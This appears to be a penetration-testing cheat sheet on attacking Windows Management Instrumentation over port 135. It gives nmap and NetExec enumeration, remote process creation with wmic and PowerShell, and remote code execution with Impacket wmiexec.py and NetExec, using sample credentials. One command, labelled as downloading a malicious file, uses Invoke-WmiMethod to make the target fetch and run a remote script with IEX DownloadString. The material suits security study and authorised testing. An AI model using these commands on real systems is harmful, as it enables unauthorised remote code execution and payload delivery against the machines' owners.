135 - WMI

Windows Management Instrumentation (WMI) is a Windows feature that allows administrators to remotely manage and monitor systems. It is used to query system information, configure settings, execute commands, and automate administrative tasks across local or remote machines.

By default, WMI uses DCOM for remote communication. It connects first over RPC on port 135, then switches to dynamically assigned high ports (typically 49152–65535) to exchange data. Remote WMI access usually requires administrative privileges unless specific permissions are delegated.

Enumeration

# Scan ports
nmap -p135,49152-65535 10.129.229.244 -sV

# Test credentials
nxc wmi 10.129.229.244 -u helen -p RedRiot88

Lateral Movement

Windows

• WMIC is deprecated as of Windows 10 and superseded by PowerShell cmdlets.

• WMI cmdlets are deprecated in PowerShell 6+ and replaced with CIM cmdlets

We can interact with WMI using wmic or various PowerShell cmdlets to query and manage various aspects of the Windows operating system programmatically through different classes.

Class	Usage
Win32_OperatingSystem	Details about the operating system
Win32_Process	Manage processes
Win32_Service	Handle services
Win32_ComputerSystem	Overall system information

# Query operating system information with wmic
wmic /node:172.10.10.62 os get Caption,CSDVersion,OSArchitecture,Version

# Query operating system information with PowerShell
Get-WmiObject -Class Win32_OperatingSystem -ComputerName 172.10.10.62 | Select-Object Caption, CSDVersion, OSArchitecture, Version

We can also use WMI to achieve RCE for performing admin tasks, such as manage processes, run scripts, or change system configurations.

# Start notepad on the target machine with wmic
wmic /node:172.10.10.62 process call create "notepad.exe"

# Start notepad on the target machine with PowerShell
Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList "notepad.exe" -ComputerName 172.20.0.52

# Credentialed query with wmic
wmic /user:username /password:password /node:172.10.10.62 os get Caption,CSDVersion,OSArchitecture,Version

# Credentialed query with PowerShell
$credential = New-Object System.Management.Automation.PSCredential("username", (ConvertTo-SecureString "password" -AsPlainText -Force));
Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList "notepad.exe" -ComputerName 172.10.10.62 -Credential $credential

# Download a malicious file
Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList "powershell IEX(New-Object Net.WebClient).DownloadString('<http://10.30.55.111/s>')" -ComputerName 172.10.10.62

Linux

The wmi-client is a tool that allows remote communication with Windows systems using WMI. The client connects to Windows machines by using DCOM and RPC, which are Microsoft technologies for remote communication. Through these mechanisms, it can query system information or execute management tasks on older Windows systems such as Windows 2000, XP, and Server 2003.

# Install wmi-client
sudo apt-get install wmi-client

# Query operating system information
wmic -U batman.local/x7331%Password123! //172.10.10.62 "SELECT Caption, CSDVersion, OSArchitecture, Version FROM Win32_OperatingSystem"

The wmiexec.py from Impacket can also be used for RCE. This script requires the SMB port (445) open to work as it uses it for retrieving the command output.

# RCE via wmiexec
wmiexec.py batman.local/x7331:Password123!@172.10.10.62 whoami

# Omit output
wmiexec.py batman.local/x7331:Password123!@172.10.10.62 whoami -nooutput

NetExec can be also used to query information or RCE via WMI. This tools receives the command output via WMI rather than SMB.

# Query operating system information
netexec wmi 172.10.10.62 -u x7331 -p Password123! --wmi "SELECT * FROM Win32_OperatingSystem"

# RCE
netexec wmi 172.10.10.62 -u x7331 -p Password123! -x whoami